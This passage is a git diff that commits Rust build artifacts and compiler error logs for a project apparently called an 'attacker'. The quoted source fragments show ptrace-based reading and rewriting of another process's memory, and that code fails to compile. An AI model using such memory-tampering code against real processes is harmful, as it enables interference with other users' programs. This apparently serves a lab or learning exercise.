feature","suggested_replacement":null,"suggestion_applicability":null,"expansion":null},{"file_name":"/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs","byte_start":1365,"byte_end":1371,"line_start":81,"line_end":81,"column_start":13,"column_end":19,"is_primary":true,"text":[{"text":" pub mod ptrace;","highlight_start":13,"highlight_end":19}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0432]\u001b[0m\u001b[0m\u001b[1m: unresolved import `nix::sys::ptrace`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:2:5\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m2\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0muse nix::sys::ptrace;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^^^^^^^^^^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9mno `ptrace` in `sys`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;10mnote\u001b[0m\u001b[0m: found an item that was configured out\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0m/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs:81:13\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m79\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m #![feature = \"ptrace\"]\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m------------------\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12mthe item is gated behind the `ptrace` feature\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m80\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m #[allow(missing_docs)]\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m81\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m pub mod ptrace;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;10m^^^^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unresolved import `nix::sys::wait`","code":{"code":"E0432","explanation":"An import was unresolved.\n\nErroneous code example:\n\n```compile_fail,E0432\nuse something::Foo; // error: unresolved import `something::Foo`.\n```\n\nIn Rust 2015, paths in `use` statements are relative to the crate root. To\nimport items relative to the current and parent modules, use the `self::` and\n`super::` prefixes, respectively.\n\nIn Rust 2018 or later, paths in `use` statements are relative to the current\nmodule unless they begin with the name of a crate or a literal `crate::`, in\nwhich case they start from the crate root. As in Rust 2015 code, the `self::`\nand `super::` prefixes refer to the current and parent modules respectively.\n\nAlso verify that you didn't misspell the import name and that the import exists\nin the module from where you tried to import it. Example:\n\n```\nuse self::something::Foo; // Ok.\n\nmod something {\n pub struct Foo;\n}\n# fn main() {}\n```\n\nIf you tried to use a module from an external crate and are using Rust 2015,\nyou may have missed the `extern crate` declaration (which is usually placed in\nthe crate root):\n\n```edition2015\nextern crate core; // Required to use the `core` crate in Rust 2015.\n\nuse core::any;\n# fn main() {}\n```\n\nSince Rust 2018 the `extern crate` declaration is not required and\nyou can instead just `use` it:\n\n```edition2018\nuse core::any; // No extern crate required in Rust 2018.\n# fn main() {}\n```\n"},"level":"error","spans":[{"file_name":"src/main.rs","byte_start":37,"byte_end":41,"line_start":3,"line_end":3,"column_start":15,"column_end":19,"is_primary":true,"text":[{"text":"use nix::sys::wait::waitpid;","highlight_start":15,"highlight_end":19}],"label":"could not find `wait` in `sys`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"found an item that was configured out","code":null,"level":"note","spans":[{"file_name":"/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs","byte_start":2793,"byte_end":2812,"line_start":180,"line_end":180,"column_start":8,"column_end":27,"is_primary":false,"text":[{"text":" #![feature = \"process\"]","highlight_start":8,"highlight_end":27}],"label":"the item is gated behind the `process` feature","suggested_replacement":null,"suggestion_applicability":null,"expansion":null},{"file_name":"/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs","byte_start":2826,"byte_end":2830,"line_start":181,"line_end":181,"column_start":13,"column_end":17,"is_primary":true,"text":[{"text":" pub mod wait;","highlight_start":13,"highlight_end":17}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0432]\u001b[0m\u001b[0m\u001b[1m: unresolved import `nix::sys::wait`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:3:15\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m3\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0muse nix::sys::wait::waitpid;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9mcould not find `wait` in `sys`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;10mnote\u001b[0m\u001b[0m: found an item that was configured out\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0m/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs:181:13\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m180\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m #![feature = \"process\"]\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m-------------------\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12mthe item is gated behind the `process` feature\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m181\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m pub mod wait;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;10m^^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unresolved import `nix::unistd::Pid`","code":{"code":"E0432","explanation":"An import was unresolved.\n\nErroneous code example:\n\n```compile_fail,E0432\nuse something::Foo; // error: unresolved import `something::Foo`.\n```\n\nIn Rust 2015, paths in `use` statements are relative to the crate root. To\nimport items relative to the current and parent modules, use the `self::` and\n`super::` prefixes, respectively.\n\nIn Rust 2018 or later, paths in `use` statements are relative to the current\nmodule unless they begin with the name of a crate or a literal `crate::`, in\nwhich case they start from the crate root. As in Rust 2015 code, the `self::`\nand `super::` prefixes refer to the current and parent modules respectively.\n\nAlso verify that you didn't misspell the import name and that the import exists\nin the module from where you tried to import it. Example:\n\n```\nuse self::something::Foo; // Ok.\n\nmod something {\n pub struct Foo;\n}\n# fn main() {}\n```\n\nIf you tried to use a module from an external crate and are using Rust 2015,\nyou may have missed the `extern crate` declaration (which is usually placed in\nthe crate root):\n\n```edition2015\nextern crate core; // Required to use the `core` crate in Rust 2015.\n\nuse core::any;\n# fn main() {}\n```\n\nSince Rust 2018 the `extern crate` declaration is not required and\nyou can instead just `use` it:\n\n```edition2018\nuse core::any; // No extern crate required in Rust 2018.\n# fn main() {}\n```\n"},"level":"error","spans":[{"file_name":"src/main.rs","byte_start":56,"byte_end":72,"line_start":4,"line_end":4,"column_start":5,"column_end":21,"is_primary":true,"text":[{"text":"use nix::unistd::Pid;","highlight_start":5,"highlight_end":21}],"label":"no `Pid` in `unistd`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"found an item that was configured out","code":null,"level":"note","spans":[{"file_name":"/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs","byte_start":3695,"byte_end":3714,"line_start":159,"line_end":159,"column_start":4,"column_end":23,"is_primary":false,"text":[{"text":"#![feature = \"process\"]","highlight_start":4,"highlight_end":23}],"label":"the item is gated behind the `process` feature","suggested_replacement":null,"suggestion_applicability":null,"expansion":null},{"file_name":"/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs","byte_start":3945,"byte_end":3948,"line_start":165,"line_end":165,"column_start":12,"column_end":15,"is_primary":true,"text":[{"text":"pub struct Pid(pid_t);","highlight_start":12,"highlight_end":15}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0432]\u001b[0m\u001b[0m\u001b[1m: unresolved import `nix::unistd::Pid`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:4:5\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m4\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0muse nix::unistd::Pid;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^^^^^^^^^^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9mno `Pid` in `unistd`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;10mnote\u001b[0m\u001b[0m: found an item that was configured out\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0m/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs:165:12\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m159\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m#![feature = \"process\"]\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m-------------------\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12mthe item is gated behind the `process` feature\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m...\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m165\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mpub struct Pid(pid_t);\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;10m^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"aborting due to 3 previous errors","code":null,"level":"error","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror\u001b[0m\u001b[0m\u001b[1m: aborting due to 3 previous errors\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"For more information about this error, try `rustc --explain E0432`.","code":null,"level":"failure-note","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1mFor more information about this error, try `rustc --explain E0432`.\u001b[0m\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-187f40608df38efc/bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-187f40608df38efc/bin-project-hbj-attacker
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-187f40608df38efc/bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-187f40608df38efc/bin-project-hbj-attacker.json
new file mode 100644
index 0000000..96178a2
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-187f40608df38efc/bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":17672942494452627365,"path":4942398508502643691,"deps":[[5150833351789356492,"nix",false,15811409210602710039]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-187f40608df38efc/dep-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-187f40608df38efc/dep-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-187f40608df38efc/dep-bin-project-hbj-attacker
new file mode 100644
index 0000000..d2376bb
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-187f40608df38efc/dep-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-187f40608df38efc/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-187f40608df38efc/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-187f40608df38efc/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-187f40608df38efc/output-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-187f40608df38efc/output-bin-project-hbj-attacker
new file mode 100644
index 0000000..310e53f
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-187f40608df38efc/output-bin-project-hbj-attacker
@@ -0,0 +1,21 @@
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `mem`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":2640,"byte_end":2643,"line_start":93,"line_end":93,"column_start":21,"column_end":24,"is_primary":true,"text":[{"text":" let word_size = mem::size_of::();","highlight_start":21,"highlight_end":24}],"label":"use of unresolved module or unlinked crate `mem`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `mem`, use `cargo add mem` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this module","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use std::mem;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `mem`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:93:21\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m93\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let word_size = mem::size_of::();\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `mem`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `mem`, use `cargo add mem` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this module\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use std::mem;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":2655,"byte_end":2659,"line_start":93,"line_end":93,"column_start":36,"column_end":40,"is_primary":true,"text":[{"text":" let word_size = mem::size_of::();","highlight_start":36,"highlight_end":40}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:93:36\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m93\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let word_size = mem::size_of::();\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":3103,"byte_end":3107,"line_start":105,"line_end":105,"column_start":73,"column_end":77,"is_primary":true,"text":[{"text":" let orig_word = unsafe { ptrace::read(pid, aligned_addr as *mut libc::c_void)? };","highlight_start":73,"highlight_end":77}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:105:73\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m105\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let orig_word = unsafe { ptrace::read(pid, aligned_addr as *mut libc::c_void)? };\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":3352,"byte_end":3356,"line_start":109,"line_end":109,"column_start":24,"column_end":28,"is_primary":true,"text":[{"text":" let new_word = libc::c_long::from_ne_bytes(bytes);","highlight_start":24,"highlight_end":28}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing one of these type aliases","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use std::ffi::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null},{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use std::os::raw::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null},{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use core::ffi::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null},{"message":"if you import `c_long`, refer to it directly","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":3352,"byte_end":3358,"line_start":109,"line_end":109,"column_start":24,"column_end":30,"is_primary":true,"text":[{"text":" let new_word = libc::c_long::from_ne_bytes(bytes);","highlight_start":24,"highlight_end":30}],"label":null,"suggested_replacement":"","suggestion_applicability":"Unspecified","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m 